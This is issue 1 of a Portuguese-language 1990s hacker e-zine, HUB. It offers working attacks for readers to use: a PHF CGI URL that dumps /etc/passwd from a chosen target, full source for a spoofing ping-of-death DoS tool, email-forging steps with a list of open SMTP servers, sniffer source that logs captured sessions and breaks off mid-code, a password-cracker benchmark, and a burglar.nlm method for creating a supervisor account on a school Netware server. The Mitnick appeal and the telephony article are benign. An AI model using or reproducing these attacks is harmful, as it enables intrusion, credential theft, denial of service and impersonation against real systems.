Copy Link
Add to Bookmark
Report

HUB 1

eZine's profile picture
Published in 
Hackers Unidos do Brasil
 · 1 year ago

HUB

Editores

Cyber Optik (cyberoptik@hackhour.com.br)
Overall (overall@hackhour.com.br

Colaboradores

ARG (arg_hhh@geocities.com)
Bat (bat@hackhour.com.br)
Ben Reilly (benreilly@mailexcite.com
Cosmo cosmo@mandic.com.br
Earth Quake (equake@hackhour.com.br)
Fernanda Serpa (fserpa@netmarket.com.br)
Jaba Hanks (jabahanks@geocities.com)
Lufe (lufe@iname.com)
(entre outros que preferiram não se identificar)

Index

  1. Editorial (Overall)
  2. Editorial (Cyber Optik)
  3. Desenterrando Velharias...
  4. SSPing (código fonte)
  5. Como enviar um Fakemail.
  6. Sniffer para Netware (código fonte)
  7. Ajudem Kevin Mitnick... (Fernanda Serpa)
  8. Teste: Brutes... qual é o melhor?
  9. Hackeando o netware da sua escola... (ARG)
  10. Telefonia no Brasil (Ben Reilly)
  11. Como transformar seu modem UsRobotics Sportster em um Courier (Earth Quake)
  12. Crackeando o Netscape e os passwords do Microsoft Mail (The.Avatar - traduzido por BAT)
  13. Bug no ICQ (Lufe)
  14. Linguagens de Programação (Jabahanks)
  15. Reforma Agrária no Ar
  16. Humor (em Inglês) - The Conscience of a Hippie
  17. Creditos

Editorial - Overall

Objetivo: transmitir informações que não são facilmente encontradas sem que se leia as entrelinhas. Bugs, exploits, falhas em sistemas operacionais, técnicas de hacking e coisas do tipo serão constantes em nossas páginas virtuais.

Linguagem: não usaremos linguagem chula em nossos textos, pois nosso objetivo não é ofender ninguém, mas informar. Apesar de que sempre tem uma hora ou outra que uma linguagenzinha de baixo calão não faz mal à ninguém... eheheh :-)

Formato: ainda não definitivamente decidido. Estamos soltando o número 1 no formato HTML para preservarmos a acentuação portuguesa, para termos um mínimo de formatação de texto (negrito, itálico, etc) e para facilitar a divulgação pela web. Apesar de estarmos usando o HTML, não usaremos nenhum recurso que o primeiro Mosaic não possa abrir.

Tamanho:pequeno. A idéia é que tenhamos edições frequentes e não muito longas, para facilitar nosso trabalho no levantamento dos dados e para nos certificar que a informação é nova.

Estilo:livre. Como temos diversos autores, e aceitamos textos enviados por terceiros, desde que de autoria própria ou traduções, não temos como ter um estilo uniforme. Cada um faz seu estilo. Somos um país livre! Nada de imposições! eheheh...

Conteúdo:livre. Desde o assunto tenha a ver com computadores falaremos de tudo um pouco e de um pouco, tudo. :-)

Bom... Acho que pra começar é isso. Só queria lembrar que nenhum de nós tem filhos em idade de ler e que por isso não, repito NÃO nos responsabilizamos por nenhum, repito NENHUM ato cometido por qualquer pessoa que ler este zine, não importa se foi ou não inspirado no que dissemos, nos arquivos que mencionarmos, nos fontes que dermos ou em qualquer material relacionado à HUB. Se você fizer merda isso é problema seu. Corre pra tua mãe. Se vira! Tô fora, bro...

Ah! Gostaria também de mencionar nosso apoio ao pessoal da Anistia Internacional no que diz respeito à prisão de Kevin Mitnick. Pô! O cara tá preso à um tempão e nem julgado ele foi ainda... Ninguém sabe nem se ele é culpado ou inocente... Pegaram o cara pra Cristo! Eu sei que isso não foi no Brasil, mas com a repercussão que esse caso ainda tá tendo pelo mundo, se a moda pega aqui no Brasil também, vai sobrar cadeia pra tudo quanto é lado...


Tempo que Kevin está na prisão aguardando julgamento...

Editorial - Cyber Optik

E aí galera!!! Estamos finalmente comemorando a primeira edição da HUB. Até que enfim!!! Achei que fossemos parar na edição 0 (zero). Bom, como é uma edição especial, eu precisava colocar algumas coisas legais, mas infelizmente meu tempo anda meio curto (é, eu estudo e trabalho!), portanto vou tentar ser o mais breve possível nas explicações. Qualquer dúvida mande um email para cyberoptik@hackhour.com.br, mas lembrem-se: Só serão respondidas as perguntas cabíveis, perguntas que eu considerar "Lammer" não serão respondidas. Perguntas lammers, enviem para #@!$¨* que elas serão respondidas...Bom gostaria, antes de iniciar, de pedir desculpas por não publicar ainda a FAQ de "Como Hackear NT", pois o tempo foi muito curto e eu não pude terminar de fazer todos os testes ainda, mas assim que estiver pronto, com certeza eu publicarei.

Creio que essa edição será de grande utilidade para os amantes da computação pois colocamos matérias bem diversificadas para agradar todos os gostos. Mas vamos ao que interessa:

Desenterrando Velharias

Técnica de PHF

Esta é uma técnica que eu acho que funciona em muitos servidores ainda, mas muitos já corrigiram esse Bug. Mas do que se trata? A Técnica do PHF, consiste na forma mais fácil de pegar o arquivo de Passwords de um servidor que tenha um Lammer como Sys Admim. Como ele funciona? Simples, rápido e não requer prática; qualquer lammer pode fazer, basta abrir seu browser e digitar:http://o_dominio_vai_aqui/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

Substitua o "o_dominio_vai_aqui" pelo dominio que vc deseja detonar...
Se for uma pagina da web é quase a mesma coisa:

http://www.página_da_web.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

Se funcionar, tire uma cópia do arquivo e parta para a comemoração... Se não souber o que fazer com esse arquivo, vá assitir "Chiquititas" que vc ganha mais...

SSPing (Source)

Esse é o fonte do famoso SSPING. Até onde eu sei esta é uma versão para Linux. Se quiser tente compilá-lo em outros Unix´s, mas nem tente em rWin95...Na boa... Se você não sabe compilar isso, nem tente perguntar... RTFM...

(Overall)

 #define __BSD_SOURCE 

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <string.h>
#include <arpa/inet.h>
int main(int argc, char **argv)
{
int s,i;
char buf[400];
struct ip *ip = (struct ip *)buf;
struct icmphdr *icmp = (struct icmphdr *)(ip + 1);
struct hostent *hp, *hp2;
struct sockaddr_in dst;
int offset;
int on;
int num = 5;
if (argc < 3) {
printf("Jolt v1.0 Yet ANOTHER windows95(And macOS!) compiled by
Cyber Optik\n"
);
printf("\nusage: %s [number]\n",argv[0]);
printf("\tdstaddr is the host your attacking\n");
printf("\tsaddr is the host your spoofing from\n");
printf("\tNumber is the number of packets to send, 5 is the default\n");
printf("\nNOTE: This is based on a bug that used to affect POSIX
complient, and SYSV \n\t systems so its nothing new..\n"
);
printf("\nGreets to Bill Gates! How do ya like this one? :-)\n");
exit(1);
}
if (argc == 4) num = atoi(argv[3]);
for (i=1;i<=num;i++) {
on=1;
bzero(buf, sizeof buf);
if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW )) < 0) {
perror("socket");
exit(1);
}
if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0) {
perror("IP_HDRINCL");
exit(1);
}
if ((hp = gethostbyname(argv[1])) == NULL) {
if ((ip->ip_dst.s_addr = inet_addr(argv[1])) == -1) {
fprintf(stderr, "%s: unknown host\n", argv[1]);
exit(1);
}
} else {
bcopy(hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length);
}
if ((hp2 = gethostbyname(argv[2])) == NULL) {
if ((ip->ip_src.s_addr = inet_addr(argv[2])) == -1) {
fprintf(stderr, "%s: unknown host\n", argv[2]);
exit(1);
}
} else {
bcopy(hp2->h_addr_list[0], &ip->ip_src.s_addr, hp->h_length);
}
printf("Sending to %s\n", inet_ntoa(ip->ip_dst));
ip->ip_v = 4;
ip->ip_hl = sizeof *ip >> 2;
ip->ip_tos = 0;
ip->ip_len = htons(sizeof buf);
ip->ip_id = htons(4321);
ip->ip_off = htons(0);
ip->ip_ttl = 255;
ip->ip_p = 1;
ip->ip_csum = 0; /* kernel fills in */
dst.sin_addr = ip->ip_dst;
dst.sin_family = AF_INET;
icmp->type = ICMP_ECHO;
icmp->code = 0;
icmp->checksum = htons(~(ICMP_ECHO << 8));
for (offset = 0; offset < 65536; offset += (sizeof buf - sizeof *ip)) {
ip->ip_off = htons(offset >> 3);
if (offset < 65120)
ip->ip_off |= htons(0x2000);
else
ip->ip_len = htons(418); /* make total 65538 */
if (sendto(s, buf, sizeof buf, 0, (struct sockaddr *)&dst,
sizeof dst) < 0) {
fprintf(stderr, "offset %d: ", offset);
perror("sendto");
}
if (offset == 0) {
icmp->type = 0;
icmp->code = 0;
icmp->checksum = 0;
}
}
close(s);
usleep(30000);
}
return 0;
}

Dê uma compilada nisso, vale a pena!

FakeMail

Faça telnet na porta de SMTP do servidor, a default é a 25.Digite :

telnet whitehouse.gov 25

Agora vc precisará se comunicar com o outro computador. Dê um "Helo" para abrir essa cominicação. Em seguida, dê um "MAIL FROM:" e digite o email que quiser. Logo em seguida digite "RCPT TO:" e coloque o email do destinatário. Digite "DATA" e monte o fake, tomando cuidado com o cabeçalho (Subject, CC, From...) e por fim dê um ponto "." e "QUIT".
Ex:

HELO polonorte.gov 
MAIL FROM: papainoel@polonorte.gov
RCPT TO: billgates@microsoft.com
DATA
< to: billgates@microsoft.com
< from: papainoel@polonorte.gov
< subject: Presentes
<
< Voce nao foi um bom garoto e por isso nao vai
< ganhar presentes este ano...
< Tente fazer um OS melhor no ano q vem...
< .
QUIT

Não esqueça de formatar bem seu texto, caso contrário qualquer lammer desconfiará de seu fakemail.

OBS:Note que alguns servidores tem o RFC 931 implementado, esconder a linha "MAIL FROM:" não funcionará. Envie primeiramente um email para vc mesmo antes de fazer qualquer besteira. Para maiores informações leia o RFC 822 "Standart for a format of ARPA Internet messages."

Alguns servidores:

Nome do servidor         Porta de conexão 
plix.com 25
ids.net 25
student.uq.edu.au 25
istar.ca 25
total.net 25
future.net 25
netfoward.com 25
netcreations.com 25
hwg.org 25
w3.org 25
mit.edu 25
nytimes.com 25
ns.net 25

O jeito mais facil de saber quais portas de um servidor estão abertas, é passando um Portscan nele...

Sniffer para Netware...

Mais uma vez c vc ñ sabe compilar isso... RTFM...Overall

/* Esniff.c */ 
#include <stdio.h>
#include <ctype.h>
#include <string.h>
#include <sys/time.h>
#include <sys/file.h>
#include <sys/stropts.h>
#include <sys/signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <net/nit_if.h>
#include <net/nit_buf.h>
#include <net/if_arp.h>
#include <netinet/in.h>
#include <netinet/if_ether.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <netinet/ip_var.h>
#include <netinet/udp_var.h>
#include <netinet/in_systm.h>
#include <netinet/tcp.h>
#include <netinet/ip_icmp.h>
#include <netdb.h>
#include <arpa/inet.h>
#define ERR stderr
char *malloc();
char *device,
*ProgName,
*LogName;
FILE *LOG;
int debug=0;
#define NIT_DEV "/dev/nit"
#define CHUNKSIZE 4096 /* device buffer size */
int if_fd = -1;
int Packet[CHUNKSIZE+32];
void Pexit(err,msg)
int err; char *msg;
{ perror(msg);
exit(err); }
void Zexit(err,msg)
int err; char *msg;
{ fprintf(ERR,msg);
exit(err); }
#define IP ((struct ip *)Packet)
#define IP_OFFSET (0x1FFF)
#define SZETH (sizeof(struct ether_header))
#define IPLEN (ntohs(ip->ip_len))
#define IPHLEN (ip->ip_hl)
#define TCPOFF (tcph->th_off)
#define IPS (ip->ip_src)
#define IPD (ip->ip_dst)
#define TCPS (tcph->th_sport)
#define TCPD (tcph->th_dport)
#define IPeq(s,t) ((s).s_addr == (t).s_addr)
#define TCPFL(FLAGS) (tcph->th_flags & (FLAGS))
#define MAXBUFLEN (128)
time_t LastTIME = 0;
struct CREC {
struct CREC *Next,
*Last;
time_t Time; /* start time */
struct in_addr SRCip,
DSTip;
u_int SRCport, /* src/dst ports */
DSTport;
u_char Data[MAXBUFLEN+2]; /* important stuff :-) */
u_int Length; /* current data length */
u_int PKcnt; /* # pkts */
u_long LASTseq;
};
struct CREC *CLroot = NULL;
char *Symaddr(ip)
register struct in_addr ip;
{ register struct hostent *he =
gethostbyaddr((char *)&ip.s_addr, sizeof(struct in_addr),AF_INET);
return( (he)?(he->h_name):(inet_ntoa(ip)) );
}
char *TCPflags(flgs)
register u_char flgs;
{ static char iobuf[8];
#define SFL(P,THF,C) iobuf[P]=((flgs & THF)?C:'-')
SFL(0,TH_FIN, 'F');
SFL(1,TH_SYN, 'S');
SFL(2,TH_RST, 'R');
SFL(3,TH_PUSH,'P');
SFL(4,TH_ACK, 'A');
SFL(5,TH_URG, 'U');
iobuf[6]=0;
return(iobuf);
}
char *SERVp(port)
register u_int port;
{ static char buf[10];
register char *p;
switch(port) {
case IPPORT_LOGINSERVER: p="rlogin"; break;
case IPPORT_TELNET: p="telnet"; break;
case IPPORT_SMTP: p="smtp"; break;
case IPPORT_FTP: p="ftp"; break;
default: sprintf(buf,"%u",port); p=buf; break;
}
return(p);
}
char *Ptm(t)
register time_t *t;
{ register char *p = ctime(t);
p[strlen(p)-6]=0; /* strip " YYYY\n" */
return(p);
}
char *NOWtm()
{ time_t tm;
time(&tm);
return( Ptm(&tm) );
}
#define MAX(a,b) (((a)>(b))?(a):(b))
#define MIN(a,b) (((a)<(b))?(a):(b))
/* add an item */
#define ADD_NODE(SIP,DIP,SPORT,DPORT,DATA,LEN) { \
register struct CREC *CLtmp = \
(struct CREC *)malloc(sizeof(struct CREC)); \
time( &(CLtmp->Time) ); \
CLtmp->SRCip.s_addr = SIP.s_addr; \
CLtmp->DSTip.s_addr = DIP.s_addr; \
CLtmp->SRCport = SPORT; \
CLtmp->DSTport = DPORT; \
CLtmp->Length = MIN(LEN,MAXBUFLEN); \
bcopy( (u_char *)DATA, (u_char *)CLtmp->Data, CLtmp->Length); \
CLtmp->PKcnt = 1; \
CLtmp->Next = CLroot; \
CLtmp->Last = NULL; \
CLroot = CLtmp; \
}
register struct CREC *GET_NODE(Sip,SP,Dip,DP)
register struct in_addr Sip,Dip;
register u_int SP,DP;
{ register struct CREC *CLr = CLroot;
while(CLr != NULL) {
if( (CLr->SRCport == SP) && (CLr->DSTport == DP) &&
IPeq(CLr->SRCip,Sip) && IPeq(CLr->DSTip,Dip) )
break;
CLr = CLr->Next;
}
return(CLr);
}
#define ADDDATA_NODE(CL,DATA,LEN) { \
bcopy((u_char *)DATA, (u_char *)&CL->Data[CL->Length],LEN); \
CL->Length += LEN; \
}
#define PR_DATA(dp,ln) { \
register u_char lastc=0; \
while(ln-- >0) { \
if(*dp < 32) { \
switch(*dp) { \
case '\0': if((lastc=='\r') || (lastc=='\n') || lastc=='\0') \
break; \
case '\r': \
case '\n': fprintf(LOG,"\n : "); \
break; \
default : fprintf(LOG,"^%c", (*dp + 64)); \
break; \
} \
} else { \
if(isprint(*dp)) fputc(*dp,LOG); \
else fprintf(LOG,"(%d)",*dp); \
} \
lastc = *dp++; \
} \
fflush(LOG); \
}
void END_NODE(CLe,d,dl,msg)
register struct CREC *CLe;
register u_char *d;
register int dl;
register char *msg;
{
fprintf(LOG,"\n-- TCP/IP LOG -- TM: %s --\n", Ptm(&CLe->Time));
fprintf(LOG," PATH: %s(%s) =>", Symaddr(CLe->SRCip),SERVp(CLe->SRCport));
fprintf(LOG," %s(%s)\n", Symaddr(CLe->DSTip),SERVp(CLe->DSTport));
fprintf(LOG," STAT: %s, %d pkts, %d bytes [%s]\n",
NOWtm(),CLe->PKcnt,(CLe->Length+dl),msg);
fprintf(LOG," DATA: ");
{ register u_int i = CLe->Length;
register u_char *p = CLe->Data;
PR_DATA(p,i);
PR_DATA(d,dl);
}
fprintf(LOG,"\n-- \n");
fflush(LOG);
if(CLe->Next != NULL)
CLe->Next->Last = CLe->Last;
if(CLe->Last != NULL)
CLe->Last->Next = CLe->Next;
else
CLroot = CLe->Next;
free(CLe);
}
/* 30 mins (x 60 seconds) */
#define IDLE_TIMEOUT 1800
#define IDLE_NODE() { \
time_t tm; \
time(&tm); \
if(LastTIMENext; \
if(CLe->Time

Ajude Kevin!

Kevin David Mitnick, nascido em Van Nuys, Califórnia em 06.08.63. Preso em 15.02.95 sob alegação de violação de condicional, acesso não autorizado a sistemas de comunicação, entre outras acusações. Encontra-se detido atualmente no Metropolitan Detention Center, de Los Angeles, Califórnia.

Meu nome é Fernanda Serpa, sou ativista de direitos humanos e membro da Anistia Internacional. Juntamente com dois amigos, Gustavo Weide, técnico em computação e Ana Elisa Prates, ativista de direitos humanos, estamos iniciando uma campanha a nível mundial para assegurar ao "hacker" Kevin David Mitnick, um julgamento justo e condições carcerárias saudáveis de acordo com a Declaração Universal dos Direitos Humanos, em especial nos seus artigos V, VI, VII, VIII, X, XI-1 e 2 que vêm sendo sistematicamente violados no caso em questão. De acordo com a imprensa americana e internacional, Kevin David Mitnick foi preso sob condições ilegais contrariando a Declaração Universal dos Direitos Humanos e a própria Constituição Americana. A grande "caçada eletrônica" desencadeada contra Mitnick expôs inclusive a tênue linha que separa os direitos constitucionais da privacidade com o cumprimento das leis que, parece, foram violadas em nome da suposta "ameaça" chamada Kevin Mitnick.

Preocupação por maus tratos

Kevin Mitnick já teve seus direitos violados quando da sua prisão anterior em dezembro de 1988. Foi negada sua fiança apesar da legislação americana afirmar que a Lei Federal só "considera perigoso para a sociedade o réu que foi acusado de crime violento, crime capital ou crime relacionado com drogas envolvendo uma sentença de mais de dez anos".Trecho do livro de Jonathan Littman - "O Jogo do Fugitivo - Em linha direta com Kevin Mitnick":

"Ele cumpriu oito meses na solitária no Centro Metropolitano de Detenção de Los Angeles e quatro meses em Lompoc, perto da costa, onde conheceu Ivan Boesky. Depois, após seis meses numa residência judia de transição para o retorno à sociedade, Kevin Mitnick tentou reingressar na força de trabalho. Conseguiu um lugar de programador em Las Vegas, mas seu empregador tinha tanto medo da sua reputação que ele não podia ficar sozinho na sala dos computadores. Pela lei, Mitnick teve de contar que era um ex-condenado.

Finalmente, depois que perdeu o emprego de programador em Las Vegas, em junho de 1991, Mitnick convenceu-se de que seus esforços eram em vão. Ele candidatou-se a emprego em todos os cassinos informatizados: Caesar's, Mirage, Sands. Todos pareciam interessados, até que seu agente da condicional telefonava ou escrevia.O governo federal decidira que Kevin Mitnick era um perigo para a sociedade, e, como um estuprador condenado ou um molestador de crianças, ele era monitorado. Seu agente da condicional entrava persistentemente em contato com os possíveis empregadores: 'Ele tem acesso a dinheiro em espécie? Quero que o senhor compreenda o perigo...' ".

Fala Kevin Mitnick no mesmo livro:

" - Cumpri oito meses no MDC ( Metropolitan Detention Center - Los Angeles ). A solitária era um inferno. Diziam que eu era demasiado perigoso para chegar perto de um telefone. Deixavam que eu saísse uma hora por dia. Algemam você quando o levam para o banho. É como no cinema. Tratam você como um animal. Um só dia já é o inferno. Imagine oito meses. Ferram com as pessoas."

Como está Kevin agora? Não sabemos... A julgar pelo tratamento degradante a que foi submetido anteriormente, teme-se por maus tratos.

Um hacker ao velho estilo

Durante a perseguição iniciada em novembro de 1992 (após a expedição de mandado de prisão por violação de condicional), e que culminou em sua prisão em 15 de fevereiro de 1995, Kevin Mitnick persistiu trabalhando, fazendo bicos para sobreviver. A motivação de Kevin para a "pirataria eletrônica compulsiva" nunca foi o dinheiro. Nunca usou de forma criminosa seus conhecimentos. Kevin Mitnick nunca incitou nem cometeu atos de violência. Kevin David Mitnick é um hacker. Na definição de Jonathan Littman "um hacker ao velho estilo - Alguém que criativamente persegue conhecimento e informação".

Direitos Humanos em Movimento

Que o Governo e a sociedade americana dêem a Kevin Mitnick uma real chance de reabilitação na sociedade é apenas uma esperança. Mas EXIGIR que o Estado lhe dê um julgamento justo e condições carcerárias saudáveis é uma realidade: VOCÊ pode fazer isto escrevendo apelos para a Ministra da Justiça Americana, Ms. Janet Reno. Já começamos nossa campanha "Ajude Kevin" enviando a seguinte carta:

MS. JANET RENO 
United States Secretary of Justice
Department of Justice
10th E. Constitution Ave, N.W., Room 4400
Washington, D.C. 20530

Prezada Senhora:

De acordo com a imprensa de seu próprio país e a imprensa internacional, o Sr. Kevin David Mitnick foi preso sob condições ilegais contrariando a Declaração Universal dos Direitos Humanos e a própria Constituição Americana. O mesmo encontra-se recluso no Metropolitan Detention Center, em Los angeles, Califórnia.

Escrevo para solicitar a V.Exa. que assegure um julgamento justo e condições carcerárias saudáveis para o Sr. Kevin David Mitnick. Minha preocupação é baseada em princípios humanísticos e fundamentais do Direito Internacional.

Atenciosamente,


_________________________________Assinatura

Nota: Você pode escreve-la em português ou preferencialmente em inglês..

O importante é fazer a carta e enviá-la o mais breve possível pelo Correio. Peça a seus amigos, parentes, conhecidos, amigos da Internet para fazerem o mesmo. Sua carta se juntará a muitas outras e sem dúvida esta pressão ratificará o desejo de todos de fazer com que a Declaração Universal dos Direitos Humanos seja uma realidade em movimento. Para Kevin Mitnick. Para todos. Sem distinção.

Abraços, Fernanda Serpa e equipe.

Se você quiser entrar em contato conosco o E-mail é: fserpa@netmarket.com.br

*Nota do autor: A Sra. Fernada Serpa tem o total apoio de toda equipe da HUB no que for preciso para colaboração nesta campanha pelos direitos humanos. Pense bem, amanhã pode ser que você esteja na mesma situação dele. (Cyber Optik)

Teste: Qual Brute é melhor???

CrackerTimeComparação por SegundoObservações
John the ripper 1.46'15''26667c/s.
John the ripper 1.316'30''25641c/s.
John the ripper 1.08'05''20619c/s.
Star Crack 0.64ß9'15''18018c/s.
Star Crack 0.51ß11'25''14599c/s.
Cracker Jack 1.413'33''12300c/s.
Cracker Jack 1.3 38614'55''11173c/s.
Cracker Jack 1.3 808622'22''7452c/s.
Hades 1.00a47'05''3540c/s.
Brute 2.00(est)59'54''2782c/s.
PCUPC 2.01(est)135'37''1229c/sSuporta somente arquivos de passwords com até 500 linhas
Guess 2.1(est)141'58''1174c/sSuporta somente arquivos de passwords com até 1000 linhas
Killer Cracker 9.5(est)151'12''1105c/sSuporta somente arquivos de passwords com até 1000 linhas
Xit 2.0(est)195'37''852c/s.
Hellfire Cracker 1.3infinito0c/sNão consegui terminar o teste, pois ele deu pau.

Este teste foi feito com um Pentium 133, com 16MB de RAM, com um cache de 2MB. A Word List tinha só 10000 palavras(não deu tempo de gerar uma maior e o arquivo de passwords tem 1000 passwords, ele achou 554 passwords.

Hackeando o Netware da sua escola...

Ensinarei aqui como criar uma conta com nivel de Superusuario.
É muito fácil, qualquer ser vivo consegue (até uma samambaia!). Só tem um problema... é preciso usar um arquivo binário (que não posso colocar no texto, mas segue em anexo no zine)...
Bom vamos lá !!!
(O processo descrito a seguir deve ser executado diretamente no servidor da rede) Saia do Monitor, ou qualquer coisa que esteja sendo executada no momento, caia no prompt da rede. Digite a seguinte linha:"load a:\burglar.nlm super-arg"

É claro que você pode mudar esse SUPER-ARG !!!!, que é o nome da conta.
Fácil né ???
NAO ME RESPONSABILIZO POR NADA OK ?????
SE NAO FUNCIONAR OU DER PAU NO SEU SERVIDOR, .... PROBLEMA SEU !!!
ISSO AI FOI TESTADO EM UM SERVIDOR RODANDO NETWARE 3.11....

[]'s ARG

TELEFONIA NO BRASIL

Este texto não tem a pretensão de se tornar uma Bíblia no assunto, que de tão extenso não pode ser totalmente explicado em apenas um artigo. A idéia básica foi de complementar um artigo escrito pelo colega Derneval (Barata Elétrica) para a 2600. Neste artigo Derneval mostra aos americanos a situação caótica de nosso Sistema Telefônico, realmente "it sucks". Porém, ao contrário do que muitos pensam, nosso sistema não é tão antigo assim. Boa parte de nossa rede está digitalizada, apesar de ainda existirem algumas Centrais Telefônicas do tipo passo-a-passo em operação (inclusive em São Paulo, como na região central e Pinheiros). Nosso grande problema está na colcha de retalhos que é nossa rede: centrais antigas interligadas a centrais digitais, de fabricantes diferentes com certas incompatibilidades em sua troca de sinalização.

Entende-se por "sinalização" ao protocolo de comunicação entre centrais, com o intuito de se completar uma chamada telefônica. Esta sinalização pode ser de dois tipos: de linha ou registro. A sinalização de linha é conhecida por todos, são os tons de discagem, campainha, etc. A sinalização de registro é usada basicamente para a transmissão das características dos assinantes telefônicos a central e entre outras funções define o modo de tarifá-los.

Deste modo, este artigo irá detalhar um pouco mais este último tipo de sinalização, que pode ser de dois tipos: de "Canal Associado" ou de "Canal Comum".

Explicando melhor: as chamadas telefônicas trafegam pela rede telefônica através de feixes de 2Mbps (o famoso feixe E1), que são formados por 32 canais de 64Kbps que contem 30 chamadas telefônicas e/ou informações de sinalização.

As centrais antigas (passo-a-passo ou Crossbar) usam a sinalização por Canal Associado. Nestas, a sinalização trocada entre as centrais de comutação telefônica consiste de sinais acústicos que são trocados durante o estabelecimento e fim de uma ligação. Assim, quando o chamado "Assinante A" (que origina a chamada) inicia a discagem, a central de destino ou uma intermediária interpreta o dígito e pelo mesmo canal ocupado pela chamada envia um sinal (A1) para a central na qual o assinante A está plugado, solicitando o envio do próximo digito, assim sendo até a chamada se completar. Daí o nome de "Canal Associado", pois tanto a voz quanto a sinalização seguem pelo mesmo canal.

Nas centrais digitais (CPA) a brincadeira é um pouco diferente: elas devem ser capazes de interpretar a sinalização das centrais antigas para garantir o funcionamento entre elas, mas quando a sinalização envolve duas CPA's um protocolo diferente é utilizado: a sinalização por "Canal Comum". Neste caso, do feixe E1 30 canais são utilizados para voz, um para sincronismo e o outro para as informações de sinalização de todas as chamadas telefônicas do feixe. Dai o nome "Canal Comum": todas as sinalizações compartilham apenas um canal. Este tipo de sinalização recebe no Brasil o nome de "Sinalização por Canal Comum Numero 7", e é uma mescla de características do padrão europeu (ITU-T N7) com o americano (SS7), daí os problemas: cada fabricante interpreta as normas Telebrás do modo que atende melhor, algumas tendendo para o americano e outros para o europeu. A principal diferença entre os protocolos (além do fato do sistema americano usar um feixe T1 de 1.5Mbps em vez do E1 de 2Mbps) está nos subsistemas utilizados. Vendo-se na figura abaixo:

                                   SINALIZACAO N7 


Celular Equip. ISDN Telefone Comum
| | |
---------- ---------- ----------
Subsistemas ..... | IS41 | | ISUP | | TUP | ...(outros)
de Usuarios ---------- ---------- ----------
(UP's) | | |
| | |
---------------------------------------------------------
| |
| MTP |
| |
---------------------------------------------------------

Aos familiarizados com TCP/IP, o esquema acima segue o modelo OSI de comunicação por camadas: as camadas 1 a 3, de nível mais próximo ao hardware são cuidadas pelo MTP (Message Transfer Part, ou Subsistema de Transferencia de Mensagens), que se encarrega de transmitir os pacotes de sinalização pela rede.

As camadas 4 a 7 são cobertas pelos Subsistemas de Usuários (UP's). Entende-se por usuario os diversos tipos de equipamentos que necessitam de uma Central de Comutação: telefones fixos, celulares, computadores com conexão ISDN, qualquer coisa que venha a ser inventada no futuro, basta que se crie o seu próprio subsistema.

Voltando as diferenças entre o padrão americano e europeu: o padrão europeu prevê o Subsistema de Usuário de Telefonia (TUP Telephone User-Part) e o Subsistema de Usuário ISDN (ISUP ISDN User-Part) como aplicações distintas. Neste caso, existem mensagens diferentes para telefones comuns e equipamentos ISDN. O sistema americano considera que um telefone nada mais é do que um equipamento ISDN "pobre", ignorando o subsistema TUP e adotando-se apenas o ISUP em sua rede. Neste caso a troca de sinalização é mais simples, basta apenas que as centrais de comutação dos diversos fabricantes sejam fluentes em ISUP e as mensagens que discriminam os diferentes equipamentos ISDN identifiquem o mesmo como "telefone comum". A rede americana esta' pronta para ISDN.

E o Brasil?

Aqui a coisa veio por partes: sendo o Sistema Telebras uma estatal, não se pode escolher um determinado fabricante e encomendar uma Central de Comutação de sua preferência. Antes é preciso abrir uma concorrência publica, em que são definidos os requisitos necessários e será declarado vencedor aquele que apresentar o MENOR PREÇO (esta' implícito que ele atende as exigências por este preço...); assim um fabricante ganha em uma região, outro em outra e "todos ficam felizes". Se a prática fosse perfeita como a teoria...

Assim, em primeira etapa exigiu-se apenas que se falassem com um telefone: todos deveriam suportar apenas TUP. Não houve grandes problemas, o TUP já era definido pelo ITU-T (antigo CCITT) e dominado por todos os grandes fabricantes. O problema veio alguns anos mais tarde: telefonia celular, ISDN, etc.

Concorrências abertas, cada fabricante jurava que seu sistema era compatível com os demais, MAS.....

Assim, temos centrais telefônicas que suportam apenas o protocolo IS41 versão A enquanto todas as outras trabalham com a versão B.... O software não permite upgrade e não é possível devolver o hardware sem profundos problemas políticos (um empresário muito poderoso do ramo de Telecomunicações no Brasil detém o controle acionário de uma empresa) O mesmo pode ser dito de ISDN: cada fabricante interpreta as normas Telebras pelo seu ponto de vista.

Assim, como podemos sonhar com uma linha ISDN se não ha compatibilidade em todo o território nacional?

Ou mais simples ainda: como sonhar com um SIMPLES TELEFONE, se a rede nacional esta' tão congestionada? Sim, pois para se vencer uma concorrência com o MENOR PRECO o produto deve ser o mais enxuto possível, mesmo que não permita futuros upgrades...

E......

Aos que ficaram interessados e devem estar se perguntando: é possível o uso de BOXES no Brasil? Se o sistema usar Sinalização N7 NAO! Não é possível enviar tons pelo mesmo canal de voz para tentar enganar a central telefônica; a sinalização segue por um canal a parte (canal n.16 no Brasil e Europa e n.9 nos Estados Unidos). Mesmo se for conseguido o acesso ao canal de sinalização um eventual phracker devera' "montar" uma mensagem desejada (por exemplo, transformar um assinante tarifado em um não - tarifado) e enviar no momento certo, com os bits seqüenciais corretos, etc...

Como a nossa rede telefônica é muito grande, uma simples chamada telefônica (mesmo local) devera' passar por varias centrais, fatalmente uma delas será digital. Então, adeus boxes (na maior parte das vezes).

Porem, "presume-se" que existam comandos nas centrais que são usados para depuração de software, montando-se mensagens e enviando diretamente ao link. Como acessar uma central telefônica remotamente e enviar comandos a ela, e quais são esses comandos isto já é outra historia ...

[ ]`s

Ben Reilly

Como transformar seu modem UsRobotics Sportster em um Courier

Como e por que isso é possível?

A Us Robotics, quando fabrica o Sportster e o Courier, para diminuir o custo do material, utiliza praticamente o mesmo hardware para os dois modems. O que eles fazem é configurar como habilitado só alguns protocolos do chipset para o Sportster enquanto habilita TODOS para os modems Courier. Sacanagem? Sem dúvida...... Mas vamos descontar isso agora... hehehe... :)

Tá bom, o que eu ganho fazendo meu modem virar Courier?

